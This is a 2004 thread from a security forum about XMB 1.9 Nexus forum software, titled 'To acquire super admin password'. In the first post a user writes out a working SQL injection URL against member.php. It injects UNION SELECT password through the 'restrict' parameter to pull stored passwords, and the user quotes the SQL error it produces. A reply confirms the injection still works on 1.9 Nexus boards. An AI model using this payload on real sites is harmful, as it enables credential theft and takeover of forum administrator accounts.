 |
|
 |
 |
Menu |
 |
|
 Home |
| |
|
 Discussions |
| |
|
 Tools |
| |
|
| Affiliates |
| |
|
 Content |
| |
|
 Info |
| | |
|
|
|
|
|
User Info |
|
 Membership:
 Latest: MichaelSnaRe
 New Today: 0
 New Yesterday: 0
 Overall: 9144
 People Online:
 Visitors: 99
 Members: 0
 Total: 99
|
|
|
|
|
|
Full disclosure |
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
|
To acquire super admin password |
|
 Posted: Wed Jun 23, 2004 8:45 am |
 |
|
| dave |
| Beginner |
 |
|
| Joined: Jun 22, 2004 |
| Posts: 4 |
|
|
|
 |
|
 |
|
Okay, lets say an early build of xmb 1.9 nexus beta was used,
If you were to try to acquire the link as a guest, on some boards you would get this message
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '.private !='3' AND f.private != '2' AND f.userlist = '' AND f.p"
if you were to try the link:
http://localhost/xmb19beta/member.php?action=viewpro&member=waraxe&restrict=%20f.private=-99%20GROUP%20BY %20p.fid%20UNION%20SELECT%20password,null,9
So I assume that this issue has been fixed with final right? |
|
|
|
|
| Posted: Sat Sep 11, 2004 11:04 pm |
|
|
| morrowasted |
| Regular user |
|
|
| Joined: Sep 06, 2004 |
| Posts: 10 |
|
|
|
|
|
|
|
| Nope, still works for me on 1.9 Nexus boards. |
|
_________________
I'm new to all this, sorry for my dumbness. |
|
|
|
www.waraxe.us Forum Index -> XMB forum
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|
